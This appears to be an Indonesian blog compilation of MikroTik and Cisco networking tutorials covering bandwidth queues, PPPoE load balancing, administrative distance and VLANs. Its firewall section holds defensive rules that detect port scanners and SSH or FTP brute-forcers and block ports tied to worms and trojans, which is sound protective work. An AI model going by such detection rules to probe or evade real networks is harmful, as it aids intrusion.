untuk setingan mikrotik di rtrwnet saya

Sesuai janji saya sebelum nya, saya akan membahas bagaimana melakukan management bandwidth di Mikrotik. Saya tidak akan membahas bagaimana melakukan cara instalasi, setting ip, masquerade dan lain sebagai nya, tetapi ulasan kaliini langsung pada intinya saja, yaitu management/ Limit bandwidth.

Pada percobaan kali ini, saya menggunakan Mikrotik 2.9.27. InsyaAllah juga bisa dilakukan di mikrotik versi yang lain. Sebenarnya ada beberapa cara yang bisa dilakukan untuk membatasi bandwidth, tetapi berdasarkan pengalaman saya, dengan Simple Queue ini, adalah cara yang paling gampang melakukan management bandwidth, secara namanya aja udah simple, dan tentunya sesuai dengan namanya itu tadi, langkah-langkah yang dilakukan pun sangat simple. Cukup clack-click aja dan selesai.

Lansung praktek nya aja… Pertama, masuk dulu ke mikrotik nya, paling gampang lewat winbox aja.



Isikan sesuai dengan login anda di mikrotik dengan hak akses full.
Tentunya akan muncul tampilan mikrotk anda seperti gambar di bawah ini



Click Queue, seperti terlihat pada gambar di atas, dan akan muncul tampilan Queue List seperti di bawah ini.


Click tanda + seperti terlihat pada gambar, dan akan muncul tampilan New Simple Queue seperti pada gambar di bawah ini:


Selanjutnya anda isikan name dengan nama sesuai keinginan anda. Pada Target Address: isikan IP Address yang ingin di limit. Max limit isikan untuk maksimal bandwidth yang dialokasikan untuk IP yang ada isikan tadi, sesuai dengan kebutuhan, perhatikan untuk upload dan download, jangan sampai tertukar. Isikan juga burst limit dan burst time nya. Dan terakhir, isikan juga time nya, kapan rute yg anda buat ini akan dijalankan. Biarkan default klo anda ingin rule tersebut berjalan 24 jam. Terakhir tinggal click OK. Beres dah…

nah itu jumlah user yang saya batasin di rt rwnet saya jumlah nya sudah ada 126 user

5 speedy load balancing in mikrotik

Loadbalancing 5 Speedy dengan PPPoE
Pada Mikrotik V3
----------------------------------------------------------------------------------
/interface pppoe-client
add ac-name="" add-default-route=yes allow=pap,chap,mschap1,mschap2 comment=""
dial-on-demand=no disabled=no interface=Speedy-1 max-mru=1480 max-mtu=1480
mrru=disabled name="******@telkom.net" password="***" profile=default
service-name="" use-peer-dns=no user="***"
add ac-name="" add-default-route=yes allow=pap,chap,mschap1,mschap2 comment=""
dial-on-demand=no disabled=no interface=Speedy-2 max-mru=1480 max-mtu=1480
mrru=disabled name="******@telkom.net" password="***" profile=default
service-name="" use-peer-dns=no user="***"
add ac-name="" add-default-route=yes allow=pap,chap,mschap1,mschap2 comment=""
dial-on-demand=no disabled=no interface=Speedy-3 max-mru=1480 max-mtu=1480
mrru=disabled name="******@telkom.net" password="***" profile=default
service-name="" use-peer-dns=no user="***"
add ac-name="" add-default-route=yes allow=pap,chap,mschap1,mschap2 comment=""
dial-on-demand=no disabled=no interface=Speedy-4 max-mru=1480 max-mtu=1480
mrru=disabled name="******@telkom.net" password="***" profile=default
service-name="" use-peer-dns=no user="***"
add ac-name="" add-default-route=yes allow=pap,chap,mschap1,mschap2 comment=""
dial-on-demand=no disabled=no interface=Speedy-5 max-mru=1480 max-mtu=1480
mrru=disabled name="******@telkom.net" password="***" profile=default
service-name="" use-peer-dns=no user="***"


...


/ip firewall mangle
add chain=prerouting action=mark-connection new-connection-mark=ADSL-1
passthrough=yes connection-state=new in-interface=HotSpot nth=5,1
comment="" disabled=no
add chain=prerouting action=mark-routing new-routing-mark=ADSL-1 passthrough=no
in-interface=HotSpot connection-mark=ADSL-1 comment="" disabled=no
add chain=prerouting action=mark-connection new-connection-mark=ADSL-2
passthrough=yes connection-state=new in-interface=HotSpot nth=5,2
comment="" disabled=no
add chain=prerouting action=mark-routing new-routing-mark=ADSL-2 passthrough=no
in-interface=HotSpot connection-mark=ADSL-2 comment="" disabled=no
add chain=prerouting action=mark-connection new-connection-mark=ADSL-3
passthrough=yes connection-state=new in-interface=HotSpot nth=5,3
comment="" disabled=no
add chain=prerouting action=mark-routing new-routing-mark=ADSL-3 passthrough=no
in-interface=HotSpot connection-mark=ADSL-3 comment="" disabled=no
add chain=prerouting action=mark-connection new-connection-mark=ADSL-4
passthrough=yes connection-state=new in-interface=HotSpot nth=5,4
comment="" disabled=no
add chain=prerouting action=mark-routing new-routing-mark=ADSL-4 passthrough=no
in-interface=HotSpot connection-mark=ADSL-4 comment="" disabled=no
add chain=prerouting action=mark-connection new-connection-mark=ADSL-5
passthrough=yes connection-state=new in-interface=HotSpot nth=5,5
comment="" disabled=no
add chain=prerouting action=mark-routing new-routing-mark=ADSL-5 passthrough=no
in-interface=HotSpot connection-mark=ADSL-5 comment="" disabled=no
/ip firewall nat
add chain=srcnat action=src-nat to-addresses=[IP-Speedy-1] to-ports=0-65535
connection-mark=ADSL-1 comment="" disabled=no
add chain=srcnat action=src-nat to-addresses=[IP-Speedy-2] to-ports=0-65535
connection-mark=ADSL-2 comment="" disabled=no
add chain=srcnat action=src-nat to-addresses=[IP-Speedy-3] to-ports=0-65535
connection-mark=ADSL-3 comment="" disabled=no
add chain=srcnat action=src-nat to-addresses=[IP-Speedy-4] to-ports=0-65535
connection-mark=ADSL-4 comment="" disabled=no
add chain=srcnat action=src-nat to-addresses=[IP-Speedy-5] to-ports=0-65535
connection-mark=ADSL-5 comment="" disabled=no
/ip route
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-1
routing-mark=ADSL-1
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-2
routing-mark=ADSL-2
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-3
routing-mark=ADSL-3
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-4
routing-mark=ADSL-4
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-5
routing-mark=ADSL-5
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=PPPoE-1

buat brust time mikrotik

Pada queue tree

Max-limit merupakan batasan maksimal bandwidth yang dapat dikonsumsi

oleh komputer yang dikenakan limitasi.

Burst-limit merupakan batasan maksimal bandwidth yang dapat dikonsumsi

dalam waktu yang singkat yang ditentukan dengan busrt-time.

Burst-Thres merupakan pemicu atau trigger atau titik pembalik atau

batasan bandwidth riil yang diterima sebagai pembatas burst-limit.



contoh batasan bandwidth pada komputer a:



Max-limit=64k

Burst-limit=128k

Burst-Thres=48k

Burst-Time=2



Berarti komputer tersebut dapat memperoleh bandwidth 128kbps selama

traffic riilnya belum mencapai 48kbps, jika dia sudah mencapai traffic riilnya maka

secara otomatis bandwidth yang dia dapatkan akan berangsur-angsur turun menuju 64 kbps.

Skenario seperti ini sering diterapkan oleh beberapa ISP yang menawarkan bandwidth yang

burstable, atau warnet yang lebih mengutamakan klien yang browsing daripada klien yang melakukan

download. Dengan menggunakan konfigurasi seperti diatas sering kali klien yang browsing akan

mereka cepat karena mereka sering kali mendapatkan 128 kbps sedangkan jika mereka mulai melakukan

download data dari internet maka jatah koneksi mereka akan turun menjadi 64 kbps.

....

Orang sering kali ingin menggunakan system seperti ini namun mereka mengalami kesulitan untuk menentukan parameter-parameter yang tepat untuk konfigurasi mereka. Dengan konfigurasi yang kurang tepat sering kali klien mereka akan mendapatkan bandwidth yang lebih besar dari max-limit kita, atau bahkan jauh dari angka max-limit, lalu bagaimana cara mengisikan parameter tersebut supaya tepat? Berikut ini saya akan memberikan rumusan yang belum tentu tepat, namun sudah cukup membantu.



rumus manajement bandwidth

================================================== ===



Limit-at = Sesuai selera anda

Max-limit = Susuai selera anda

Burst-limit = < 4 x Max-limit

Burst-Thres = ¾ x Max-limit

Burst-time = < 12 s



rumusan ini belum tentu tepat,tapi cukup sebagai dasar



Atau anda dapat mendownload file yang sudah jadi disini. Namun rumus ini tidak bersifat mati, harus anda sesuaikan dengan keadaan jaringan anda, tapi anda juga dapat menjadikan rumus tersebut sebagai acuan dalam membagi bandwidth anda.Demikian sedikit ulasan saya semoga dapat bermanfaat, saya mohon maaf jika terdapat kesalahan dalam penulisan, dan kekurang tepatan perhitungan.

setting 3 speedy load balancing + setingan dasar

IP address
Load balancer = 192.168.8.10
Mikrotik dengan 3 lan card:
—> Eth1 = 192.168.8.1 (ke load balancer)
—> Eth2 = 192.168.15.1 (ke IPCOP)
—> Eth3 = 192.168.1.1 (ke Switch/hub)
IPCOP = 192.168.15.10

Modem di set mode bridge, jadi yang dial PPPoE dari loadbalancer nya

2. Setting Mikrotik

—> Ethernet Card

name=”Speedy” mtu=1500 mac-address=4C:00:10:1B:4E:6F arp=enabled disable-running-check=yes auto-negotiation=yes full-duplex=yes cable-settings=default speed=100Mbps

name=”Lokal” mtu=1500 mac-address=00:02:2A:BF:E2:08 arp=enabled disable-running-check=yes auto-negotiation=yes full-duplex=yes cable-settings=default speed=100Mbps

name=”Squid” mtu=1500 mac-address=00:0E:2E:01:62:24 arp=enabled disable-running-check=yes auto-negotiation=yes full-duplex=yes cable-settings=default speed=100Mbps

—> IP address

[admin@satelit-internet]/ip address
add address=192.168.8.1/24 interface=Speedy
add address=192.168.1.1/24 interface=Lokal
add address=192.168.15.1/24 interface=Squid

—> DNS

[admin@satelit-internet]/ip dns
set primary-dns=192.168.8.10 allow-remote-request=yes

—> Route

[admin@satelit-internet]/ip route
add gateway=192.168.8.10

—> NAT

[admin@satelit-internet]/ip firewall nat
add chain=dstnat src-address=!192.168.8.0/24 protocol=tcp dst-port=80 action=dst-nat to-addresses=192.168.8.10 to-ports=818

add chain=srcnat out-interface=Speedy action=masquerade

tujuannya membelokkan semua port 80 dari client ke port 818 (squid IPCOP) yang berfungsi sebagai web proxy

—> Mangle

tujuannya
memisahkan bandwidth internasional dan lokal (OpenIXP dan IIX)
Daftar IP Address yang diadvertise di OpenIXP dan IIX dapat di download di http://www.mikrotik.co.id/getfile.php?nf=nice.rsc
File nice.rsc ini dibuat secara otomatis di server Mikrotik Indonesia setiap pagi sekitar pk 05.30, dan merupakan data yang telah di optimasi untuk menghilangkan duplikat entry dan tumpang tindih subnet.
Untuk tutorial auto import script ke mikrotik bisa diintip disini

[admin@satelit-internet] >/ip firewall mangle

add chain=forward dst-address=192.168.1.0/24 action=change-ttl new-ttl=set:1 comment=”change TTL”

add chain=forward out-interface=internet protocol=tcp tcp-flags=syn action=change-mss new-mss=1300 comment=”change mss”

add chain=forward content=X-Cache: HIT action=mark-connection new-connection-mark=squid_conn passthrough=yes comment=”squid proxy”

chain=forward connection-mark=squid_conn action=mark-packet new-packet-mark=squid_packet passthrough=no

/* Prioritaskan ping dan DNS */

add chain=prerouting protocol=icmp action=mark-connection new-connection-mark=icmp passthrough=yes comment=”icmp”

add chain=prerouting connection-mark=icmp action=change-tos new-tos=min-delay

add chain=prerouting connection-mark=icmp action=mark-packet new-packet-mark=icmp passthrough=no

add chain=prerouting protocol=udp dst-port=53 action=mark-connection new-connection-mark=DNS passthrough=yes comment=”DNS”

add chain=prerouting connection-mark=DNS action=change-tos new-tos=max-throughput

add chain=prerouting protocol=udp dst-port=53 connection-mark=DNS action=mark-packet new-packet-mark=DNS passthrough=no

add chain=forward protocol=tcp dst-port=6000-7000 action=mark-connection new-connection-mark=IRC passthrough=yes comment=”irc”

add chain=prerouting src-address=192.168.1.0/24 protocol=tcp dst-port=6000-7000 action=mark-packet new-packet-mark=irc passthrough=no

add chain=forward connection-mark=IRC action=mark-packet new-packet-mark=irc passthrough=no

/* Upload Connections */

add chain=prerouting src-address=192.168.1.0/24 dst-address-list=!nice action=mark-packet new-packet-mark=upload comment=”upload” passthrough=no

/* Download Connections hanya untuk bandwidth internasional (OpenIXP) */

add chain=forward dst-address=!192.168.1.0/24 connection-mark=!squid_conn dst-address-list=!nice action=mark-connection new-connection-mark=download passthrough=yes comment=”download”

add chain=forward connection-mark=download action=mark-packet new-packet-mark=download passthrough=no

—> Queue type

[admin@satelit-internet]/queue tree

add name=”pfifo-64″ kind=pfifo pfifo-limit=64

add name=”pcq-down” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=dst-address pcq-total-limit=2000

add name=”pcq-up” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-address pcq-total-limit=2000

—> Queue Tree

[admin@satelit-internet]/queue tree

add name=”download” parent=lan packet-mark=download limit-at=0 queue=pcq-down priority=8 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s

—> Queue simple

[admin@satelit-internet]/queue simple

add name=”squid” dst-address=0.0.0.0/0 interface=all parent=none packet-marks=squid_packet direction=both priority=8 queue=default-small/ethernet-default limit-at=0/0 max-limit=0/0 total-queue=default-small

add name=”irc” dst-address=0.0.0.0/0 interface=all parent=none packet-marks=irc direction=both priority=8 queue=default-small/default-small limit-at=16000/16000 max-limit=16000/16000 total-queue=default-small

add name=”DNS” dst-address=0.0.0.0/0 interface=all parent=none packet-marks=DNS direction=both priority=8 queue=pfifo-64/pfifo-64 limit-at=8000/8000 max-limit=8000/8000 total-queue=default-small

add name=”icmp” dst-address=0.0.0.0/0 interface=all parent=none packet-marks=icmp direction=both priority=8 queue=pfifo-64/pfifo-64 limit-at=8000/8000 max-limit=8000/8000 total-queue=default-small

add name=”parent” dst-address=0.0.0.0/0 interface=all parent=none packet-marks=download,upload direction=both priority=8 queue=default-small/pcq-down limit-at=0/0 max-limit=0/0 total-queue=default-small

add name=”Satelit-01″ target-addresses=192.168.1.100/32 dst-address=0.0.0.0/0 interface=all parent=parent packet-marks=download,upload direction=both priority=8 queue=default-small/default-small limit-at=0/0 max-limit=0/0 total-queue=default-small
.
.
.
dst sampe 15 client

selese juga. lumayan seharian gk tidur melototin mikrotik… Laughing

blok virus di mikrotik

Several Block for filter
o Block Bogus IP Address
o Drop SSH brute forcers
o Port Scanners to list
o Filter FTP to Box
o Separate Protocol into Chains
- UDP :: Blocking UDP Packet
- TCP :: Bloking TCP Packet
- ICMP :: Limited Ping Flood
o Allow Broadcast Traffic
o Connection State


...


## Basic Configuration -
- Begin
/ ip firewall filter
add chain=forward src-address=0.0.0.0/8 action=drop comment="Block Bogus IP \
Address" disabled=no
add chain=forward dst-address=0.0.0.0/8 action=drop comment="" disabled=no
add chain=forward src-address=127.0.0.0/8 action=drop comment="" disabled=no
add chain=forward dst-address=127.0.0.0/8 action=drop comment="" disabled=no
add chain=forward src-address=224.0.0.0/3 action=drop comment="" disabled=no
add chain=forward dst-address=224.0.0.0/3 action=drop comment="" disabled=no
add chain=input protocol=tcp dst-port=22 src-address-list=ssh_blacklist
action=drop comment="Drop SSH brute forcers" disabled=no
add chain=input protocol=tcp dst-port=22 connection-state=new
src-address-list=ssh_stage3 action=add-src-to-address-list
address-list=ssh_blacklist address-list-timeout=1w3d comment=""
disabled=no
add chain=input protocol=tcp dst-port=22 connection-state=new
src-address-list=ssh_stage2 action=add-src-to-address-list
address-list=ssh_stage3 address-list-timeout=1m comment="" disabled=no
add chain=input protocol=tcp dst-port=22 connection-state=new
src-address-list=ssh_stage1 action=add-src-to-address-list
address-list=ssh_stage2 address-list-timeout=1m comment="" disabled=no
add chain=input protocol=tcp dst-port=22 connection-state=new
action=add-src-to-address-list address-list=ssh_stage1
address-list-timeout=1m comment="" disabled=no
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list
address-list="port scanners" address-list-timeout=2w comment="Port \
Scanners to list " disabled=no
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
action=add-src-to-address-list address-list="port scanners"
address-list-timeout=2w comment="" disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list
address-list="port scanners" address-list-timeout=2w comment=""
disabled=no
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list
address-list="port scanners" address-list-timeout=2w comment=""
disabled=no
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
action=add-src-to-address-list address-list="port scanners"
address-list-timeout=2w comment="" disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
action=add-src-to-address-list address-list="port scanners"
address-list-timeout=2w comment="" disabled=no
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
action=add-src-to-address-list address-list="port scanners"
address-list-timeout=2w comment="" disabled=no
add chain=input src-address-list="port scanners" action=drop comment=""
disabled=no
add chain=input protocol=tcp dst-port=21 src-address-list=ftp_blacklist
action=drop comment="Filter FTP to Box" disabled=no
add chain=output protocol=tcp content="530 Login incorrect"
dst-limit=1/1m,9,dst-address/1m action=accept comment="" disabled=no
add chain=output protocol=tcp content="530 Login incorrect"
action=add-dst-to-address-list address-list=ftp_blacklist
address-list-timeout=3h comment="" disabled=no
add chain=forward protocol=tcp action=jump jump-target=tcp comment="Separate \
Protocol into Chains" disabled=no
add chain=forward protocol=udp action=jump jump-target=udp comment=""
disabled=no
add chain=forward protocol=icmp action=jump jump-target=icmp comment=""
disabled=no
add chain=udp protocol=udp dst-port=69 action=drop comment="Blocking UDP \
Packet" disabled=no
add chain=udp protocol=udp dst-port=111 action=drop comment="" disabled=no
add chain=udp protocol=udp dst-port=135 action=drop comment="" disabled=no
add chain=udp protocol=udp dst-port=137-139 action=drop comment="" disabled=no
add chain=udp protocol=udp dst-port=2049 action=drop comment="" disabled=no
add chain=udp protocol=udp dst-port=3133 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=69 action=drop comment="Bloking TCP \
Packet" disabled=no
add chain=tcp protocol=tcp dst-port=111 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=119 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=135 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=137-139 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=445 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=2049 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=12345-12346 action=drop comment=""
disabled=no
add chain=tcp protocol=tcp dst-port=20034 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=3133 action=drop comment="" disabled=no
add chain=tcp protocol=tcp dst-port=67-68 action=drop comment="" disabled=no
add chain=icmp protocol=icmp icmp-options=0:0-255 limit=5,5 action=accept
comment="Limited Ping Flood" disabled=no
add chain=icmp protocol=icmp icmp-options=3:3 limit=5,5 action=accept
comment="" disabled=no
add chain=icmp protocol=icmp icmp-options=3:4 limit=5,5 action=accept
comment="" disabled=no
add chain=icmp protocol=icmp icmp-options=8:0-255 limit=5,5 action=accept
comment="" disabled=no
add chain=icmp protocol=icmp icmp-options=11:0-255 limit=5,5 action=accept
comment="" disabled=no
add chain=icmp protocol=icmp action=drop comment="" disabled=no
add chain=input dst-address-type=broadcast action=accept comment="Allow \
Broadcast Traffic" disabled=no
add chain=input connection-state=established action=accept comment="Connection \
State" disabled=no
add chain=input connection-state=related action=accept comment="" disabled=no
add chain=input connection-state=invalid action=drop comment="" disabled=no
- End

administrative pool

Pada umumnya protocol routing mempunyai struktur metric dan algoritma yang berbeda dengan protocol yang lain. Pada jaringan yang memiliki beberapa routing protocol, pertukaran informasi routing dan kemampuan untuk memilih jalur terbaik sangatlah penting.

Administrative distance (AD) adalah fitur yang dimiliki oleh router untuk memilih jalur terbaik ketika terdapat dua atau lebih jalur menuju tujuan yang sama dari dua routing protocol yang berbeda. Administrative distance menyatakan “reliability” dari sebuah routing protocol. Tiap routing protocol diprioritaskan terhadap yang lain dengan bantuan besaran/nilai Administrative Distance (AD).

Pemilihan Jalur Tebaik [The Best Path]
Administrative distance adalah kriteria pertama yang digunakan oleh router untuk menentukan routing protocol yang harus dijalankan, jika terdapat dua routing protocol yang menyediakan jalur untuk tujuan yang sama. AD adalah sebuah ukuran “trustworthiness” dari source of routing information. AD hanya mempunyai local significance, dan tidak melakukan advertise dalam routing update.

Nilai AD yang lebih kecil, lebih dipercaya/reliable. Contoh, Jika sebuah router menerima informasi tentang jalur menuju jaringan tertentu dari Open Shortest Path First (OSPF) (default administrative distance - 110) dan Interior Gateway Routing Protocol (IGRP) (default administrative distance - 100), Router akan memilih IGRP karena IGRP lebih dipercaya/reliable karena memiliki AD yang lebih kecil dibandingkan OSPF.
Jika source address untuk IGRP hilang atau tidak dikenal, maka router akan memilih/menjalankan routing OSPF sampai IGRP aktif kembali.

Tabel Nilai Default Administrative Distance (AD) pada Router Cisco:

Route Source Default Distance Values
Connected interface 0
Static route 1
Enhanced Interior Gateway Routing Protocol (EIGRP) summary route 5
External Border Gateway Protocol (BGP) 20
Internal EIGRP 90
IGRP 100
OSPF 110
Intermediate System-to-Intermediate System (IS-IS) 115
Routing Information Protocol (RIP) 120
Exterior Gateway Protocol (EGP) 140
On Demand Routing (ODR) 160
External EIGRP 170
Internal BGP 200
Unknown* 255

* Jika administrative distance 255, artinya router tidak mengenali source, sehingga route/jalur tidak akan diinstall/disimpan dalam table routing.

Jika anda menggunakan “route redistribution”, anda harus memodifikasi administrative distance dari Routing Protocol yang digunakan sehingga bisa melakukan prioritas. Contoh, anda ingin router memilih protocol RIP (AD 120) daripada IGRP (AD 100) ke tujuan yang sama. Anda harus memperbesar administrative distance untuk IGRP lebih dari 120, atau menurunkan administrative distance RIP lebih kecil dari 100.

Anda juga bisa memodifikasi administrative distance dengan menggunakan “distance command” pada “routing process subconfiguration mode”. Command ini menunjukkan bahwa “administrative distance” diterapkan pada “route/jalur” yang digunakan oleh “routing protocol” tertentu. Anda harus menggunakan prosedur ini ketika melakukan migrasi jaringan dari satu “routing protocol” tertentu ke “routing protocol” yang lain, dan route/jalur yang dipilih paling akhir adalah yang mempunyai nilai “administrative distance” terbesar. Perubahan administrative distance bisa menyebabkan “routing loops” dan “black holes”. Jadi, harap berhati-hati jika anda ingin merubah administrative distance.

Berikut contoh 2 routers, R1 & R2, yang terhubung via Ethernet. Interface Loopback melakukan “advertise” RIP dan IGRP pada kedua router. Terlihat bahwa IGRP lebih disukai (preferred) daripada RIP pada tabel routing karena administrative distance-nya 100.

R1#show ip route

Gateway of last resort is not set

172.16.0.0/24 is subnetted, 1 subnets
C 172.16.1.0 is directly connected, Ethernet0
I 10.0.0.0/8 [100/1600] via 172.16.1.200, 00:00:01, Ethernet0
C 192.168.1.0/24 is directly connected, Loopback0

R2#show ip route

Gateway of last resort is not set

172.16.0.0/24 is subnetted, 1 subnets
C 172.16.1.0 is directly connected, Ethernet0
C 10.0.0.0/8 is directly connected, Loopback0
I 192.168.1.0/24 [100/1600] via 172.16.1.100, 00:00:33,

Agar router R1 lebih memilih RIP daripada IGRP, ubah distance seperti dibawah ini:

R1(config)#router rip
R1(config-router)#distance 90

Sekarang lihat pada routing tabel. Router lebih memilih RIP. Router melihat RIP dengan AD 90, walaupun defaultnya 120. Catatan, bahwa nilai baru AD hanya untuk router proses dari single router (dalam hal ini R1). R2 masih memiliki IGRP dalam routing tabelnya.

R1#show ip route

Gateway of last resort is not set

172.16.0.0/24 is subnetted, 1 subnets
C 172.16.1.0 is directly connected, Ethernet0
R 10.0.0.0/8 [90/1] via 172.16.1.200, 00:00:16, Ethernet0
C 192.168.1.0/24 is directly connected, Loopback0

R2#show ip route

Gateway of last resort is not set

172.16.0.0/24 is subnetted, 1 subnets
C 172.16.1.0 is directly connected, Ethernet0
C 10.0.0.0/8 is directly connected, Loopback0
I 192.168.1.0/24 [100/1600] via 172.16.1.100, 00:00:33,

Tidak ada panduan secara umum merubah AD, karena kebutuhan setiap jaringan berbeda dan bervariasi. Anda harus menentukan matrix AD yang sesuai untuk jaringan secara keseluruhan.

Penerapan lain Administrative Distance

Salah satu alasan merubah nilai administrative distance adalah ketika anda menggunakan Routing Static untuk membackup routing lain seperti IGP. Hal ini digunakan untuk mengaktifkan link backup ketika primay link down/fail.

Contoh, anda menggunakan routing tabel R1. Dalam hal ini terdapat line ISDN yang berfungsi sebagai backup jika link utama/primary down/fail. Berikut contoh “Floating Static” untuk rute ini:

ip route 10.0.0.0 255.0.0.0 Dialer 1 250

!— Note: The Administrative Distance is set to 250.

Jika interface Ethernet down/fail, atau secara manual dijatuhkan (shutdown) pada interface Ethernet, “floating static route” segera beraksi dalam tabel routing. Semua traffic yang menuju network 10.0.0.0/8 selanjutnya akan melalui interface Dialer 1 sebagai link backup. Berikut tabel routing setelah primary link down:

R1#show ip route
Gateway of last resort is not set
172.16.0.0/24 is subnetted, 1 subnets
C 172.16.1.0 is directly connected, Ethernet0
S 10.0.0.0/8 is directly connected, Dialer1
C 192.168.1.0/24 is directly connected, Loopback0

cisco vlan konfigurasi

VLAN = Virtual Local Area Network

VLAN berguna untuk membagi broadcast domain, membagi berdasarkan job function atau departements tanpa memperhatikan lokasi dari si user dan di Setiap berbeda VLAN itu mempunyai traffic masing2.

Misalkan :

Di suatu gedung ada 3 tingkat, di gedung tersebut mempunyai banyak departemen (keuangan, produksi, IT, Penjualan dan HRD)
keuangan = 10 user
produksi = 10 user
penjualan = 4 user
HRD = 5 user
IT = 3 user
Vlan yg kita create adalah VLAN 10 = keuangan, VLAN 20 = produksi, VLAN 30 = penjualan, VLAN 40 = HRD dan VLAN 50 = IT
Maka disetiap VLAN yg kita create.. mereka mempunyai traffic masing2 dan tidak akan terkirim ke traffic vlan lain (1 VLAN = 1 broadcast domain). Jadi security dan keamanan or privacy data dari masing2 bagian bisa tetap terjaga.

VLAN itu biasanya digunakan karena keterbatasan dari interface router yg sedikit, dan kebutuhan dari user harus terpenuhi (dari 5 departemen di atas = 36 user) sedangkan interface ethernet pada router hanya terdapat 1 atau 2 ethernet saja (port ethernet pada router bisa ditambahkan dengan membeli modul tambahan berupa hardware tentunya). Oleh karena itu dibutuhkan suatu device lagi untuk memenuhi kebutuhan dari 5 departemen tersebut, device tersebut berupa switch manageable (intinya switch tersebut bisa dikonfigurasi dech) dan biasanya switch itu mempunyai port 8 s/d 24 port, nah.. berarti kebutuhan dari dari 5 departemen diatas sudah bisa tercukupi dong.. (1 masalah selesai) tp.. *ada tapinya neh*, bila di setiap VLAN ingin saling berkomunikasi.. kita tetap membutuhkan router utk komunikasi antar VLANnya “Sama aja dong Om.. beli router2 juga akhirnya ( ” tp kan kita cmn butuh 1 router utk 3 lantai (5 departement) tersebut.. So, lebih irit kan!!! Btw, Are you still with me?? anonymouse said : “ghozali banyak ngemeng neh… dah langsung ke studi case aja dech, biar gw yang bacanya juga nggak puyeng duluan..” Hihihi.. D . Ok dech om.. kita langsung ke studi case aja yah. ghozali : *sambil geplak jidad*

Studi case :

Studi casenya saya ambil dari Misalkan diatas, tetapi saya menambahkan dengan penjelasan2 utk membantu memahami dari kasus yg saya akan jelaskan dan hal2 yang lainnya agar lebih kompleks. Dan pastinya ini akan menjadi tutorial yang sangat panjang. Please be focus!!!

Di suatu gedung ada 3 tingkat, di gedung tersebut mempunyai banyak departemen (keuangan, produksi, IT, Penjualan dan HRD)
keuangan = 10 user (5 user di lt. 1 dan 5 user di lt. 2 )
produksi = 10 user (5 user di lt. 1 dan 5 user di lt. 2)
penjualan = 8 user (4 user di lt. 2 dan 4 user di lt. 3)
HRD = 5 user (5 user di lt. 2)
IT = 3 user (3 user di lt. 3)
Vlan yg kita create adalah VLAN 10 = keuangan, VLAN 20 = produksi, VLAN 30 = penjualan, VLAN 40 = HRD dan VLAN IT = 50
Dengan kebutuhan seperti diatas maka kita membutuhkan 3 switch manageable dan 1 router. Topologinya seperti ini:

O iya, sebelumnya pada setting VLAN kali ini saya tidak banyak otak-atik di VTP dan Port Securitynya. InsyaALLAH klo ada waktu akan saya menjelaskannya juga ttg VTP dan Port Security di lain waktu. Ayo kita mulai konfigurasi router dan switchnya…!!!

-=-=-= Switch =-=-=-
Pada Switch yang harus kita lakukan adalah sbb:
1. Create VLAN
2. Set port Trunk + Assign port utk trunk + set encapsulationnya
3. Assign port untuk setiap VLAN
4. Set port Access

Standarisasi nama PC client V_1.2.3
V = VLAN
1 = VLAN ID
2 = Lantai gedung
3 = Urutan di setiap lantai dan VLAN ID

Standarisasi IP Address pada setiap VLAN
VLAN 10
NETWORK = 192.168.1.0/24
GATEWAY = 192.168.1.1
VLAN 20
NETWORK = 192.168.2.0/24
GATEWAY = 192.168.2.1
VLAN 30
NETWORK = 192.168.3.0/24
GATEWAY = 192.168.3.1
VLAN 40
NETWORK = 192.168.4.0/24
GATEWAY = 192.168.4.1
VLAN 50
NETWORK = 192.168.5.0/24
GATEWAY = 192.168.5.1 Standarisasi Switch_Lt1
Create VLAN 10
Create VLAN 20
fastethernet 0/12 dipakai buat trunk ke Switch_Lt2
fastethernet 0/1 dipakai untuk PC V_10.1.1
fastethernet 0/2 dipakai untuk PC V_10.1.2

fastethernet 0/3 dipakai untuk PC V_20.1.1
fastethernet 0/4 dipakai untuk PC V_20.1.2

Standarisasi Switch_Lt2
Create VLAN 10
Create VLAN 20
Create VLAN 30
Create VLAN 40
fastethernet 0/10 dipakai buat trunk ke Rtr_VLAN
fastethernet 0/11 dipakai buat trunk ke Switch_Lt3
fastethernet 0/12 dipakai buat trunk ke Switch_Lt1
fastethernet 0/1 dipakai untuk V_10.2.1
fastethernet 0/2 dipakai untuk V_10.2.2
fastethernet 0/3 dipakai untuk V_20.2.1
fastethernet 0/4 dipakai untuk V_20.2.2
fastethernet 0/5 dipakai untuk V_30.2.1
fastethernet 0/6 dipakai untuk V_30.2.2
fastethernet 0/7 dipakai untuk V_40.2.1
fastethernet 0/8 dipakai untuk V_40.2.2 Standarisasi Switch_Lt3
Create VLAN 30
Create VLAN 50
fastethernet 0/11 dipakai buat trunk ke Switch_Lt2
fastethernet 0/1 dipakai untuk V_30.3.1
fastethernet 0/2 dipakai untuk V_30.3.2
fastethernet 0/3 dipakai untuk V_50.3.1
fastethernet 0/4 dipakai untuk V_50.3.2

Switch_Lt1:

Switch_Lt1# vlan database
Switch_Lt1(vlan)# vlan 10 name keuangan ==> create vlan 10 dengan nama keuangan
